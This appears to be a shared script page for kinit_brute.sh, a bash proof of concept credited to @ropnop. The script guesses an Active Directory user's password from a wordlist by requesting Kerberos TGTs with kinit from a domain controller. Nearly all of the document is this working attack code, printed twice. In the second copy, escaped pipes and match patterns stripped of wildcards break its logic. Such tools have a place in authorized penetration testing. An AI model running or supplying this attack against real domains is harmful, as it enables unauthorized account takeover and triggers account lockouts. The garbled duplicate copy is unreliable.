A quick tool to bruteforce an AD user's password by requesting TGTs from the Domain Controller with 'kinit'

## kinit_brute.sh
#!/bin/bash

# Title: kinit_brute.sh
# Author: @ropnop
# Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller
# The script configures the realm and KDC for you based on the domain provided and the domain controller
# Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf
# Only tested with Heimdal kerberos (error messages might be different for MIT clients)
# Note: this *will* lock out accounts if a domain lockout policy is set. Be careful


USERNAME=$1
DOMAINCONTROLLER=$2
WORDLIST=$3

if [[ $# -ne 3 ]]; then
	echo "[!] Usage: ./kinit_brute.sh full_username domainController wordlist_file"
	echo "[!] Example: ./kinit_brute.sh ropnop@contoso.com dc01.contoso.com passwords.txt"
	exit 1
fi

DOMAIN=$(echo $USERNAME | awk -F@ '{print toupper($2)}')

echo "[+] User: $USERNAME"
echo "[+] Kerberos Realm: $DOMAIN"
echo "[+] KDC: $DOMAINCONTROLLER"
echo ""

KRB5_CONF=$(mktemp)

cat > $KRB5_CONF <<'asdfasdf'
[libdefaults]
	default_realm = $DOMAIN
[realms]
	$DOMAIN = {
		kdc = $DOMAINCONTROLLER
		admin_server = $DOMAINCONTROLLER
	}
asdfasdf

while read PASSWORD; do
	RESULT=$(
	echo $PASSWORD | kinit --password-file=STDIN $USERNAME 2>&1
	)
	if [[ $RESULT == *"unable to reach"* ]]; then
		echo "[!] Unable to find KDC for realm. Check domain and DC"
		exit 1
	fi
	if [[ $RESULT == *"Wrong realm"* ]]; then
	       echo "[!] Wrong realm. Make sure domain and DC are correct"
     	       exit 1
        fi
	if [[ $RESULT == *"Clients credentials have been revoked"* ]]; then
		echo "[!] Account locked out!"
		exit 1
	fi
	if [[ $RESULT == *"Password incorrect"* ]]; then
		:
	elif [[ -z "$RESULT" ]]; then
		echo "[+] Found password: $PASSWORD"
		echo ""
		exit 1
	else
		echo "[+] Error: $RESULT"
	fi
done <$WORDLIST
	#!/bin/bash

	# Title: kinit_brute.sh
	# Author: @ropnop
	# Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller
	# The script configures the realm and KDC for you based on the domain provided and the domain controller
	# Since this configuration is only temporary though, if you want to actually use the TGT you should actually edit /etc/krb5.conf
	# Only tested with Heimdal kerberos (error messages might be different for MIT clients)
	# Note: this will lock out accounts if a domain lockout policy is set. Be careful


	USERNAME=$1
	DOMAINCONTROLLER=$2
	WORDLIST=$3

	if [[ $# -ne 3 ]]; then
	echo "[!] Usage: ./kinit_brute.sh full_username domainController wordlist_file"
	echo "[!] Example: ./kinit_brute.sh ropnop@contoso.com dc01.contoso.com passwords.txt"
	exit 1
	fi

	DOMAIN=$(echo $USERNAME \| awk -F@ '{print toupper($2)}')

	echo "[+] User: $USERNAME"
	echo "[+] Kerberos Realm: $DOMAIN"
	echo "[+] KDC: $DOMAINCONTROLLER"
	echo ""

	KRB5_CONF=$(mktemp)

	cat > $KRB5_CONF <<'asdfasdf'
	[libdefaults]
	default_realm = $DOMAIN
	[realms]
	$DOMAIN = {
	kdc = $DOMAINCONTROLLER
	admin_server = $DOMAINCONTROLLER
	}
	asdfasdf

	while read PASSWORD; do
	RESULT=$(
	echo $PASSWORD \| kinit --password-file=STDIN $USERNAME 2>&1
	)
	if [[ $RESULT == "unable to reach" ]]; then
	echo "[!] Unable to find KDC for realm. Check domain and DC"
	exit 1
	fi
	if [[ $RESULT == "Wrong realm" ]]; then
	echo "[!] Wrong realm. Make sure domain and DC are correct"
	exit 1
	fi
	if [[ $RESULT == "Clients credentials have been revoked" ]]; then
	echo "[!] Account locked out!"
	exit 1
	fi
	if [[ $RESULT == "Password incorrect" ]]; then
	:
	elif [[ -z "$RESULT" ]]; then
	echo "[+] Found password: $PASSWORD"
	echo ""
	exit 1
	else
	echo "[+] Error: $RESULT"
	fi
	done <$WORDLIST